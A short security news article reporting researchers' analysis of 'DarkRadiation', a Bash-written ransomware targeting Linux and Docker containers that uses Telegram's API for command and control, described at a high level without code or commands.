Cybersecurity researchers are sounding the alarm bell over a new ransomware strain called “DarkRadiation” that’s implemented entirely in Bash and targets Linux and Docker cloud containers, while banking on messaging service Telegram for command-and-control (C2) communications.
“The ransomware is written in Bash script and targets Red Hat/CentOS and Debian Linux distributions,” researchers from Trend Micro said in a report published last week. “The malware uses OpenSSL’s AES algorithm with CBC mode to encrypt files in various directories. It also uses Telegram’s API to send an infection status to the threat actor(s).”
As of writing, there’s no information available on the delivery methods or evidence that the ransomware has been deployed in real-world attacks.
The findings come from an analysis of a collection of hacking tools hosted on the unidentified threat actor’s infrastructure (IP address “220.127.116.11”) in a directory called “api_attack.” The toolset was first noticed by Twitter user @r3dbU7z on May 28.
DarkRadiation’s infection chain involves a multi-stage attack process and is noteworthy for its extensive reliance on Bash scripts to retrieve the malware and encrypt the files as well as Telegram API to communicate with the C2 server via hardcoded API keys.
images from Hacker News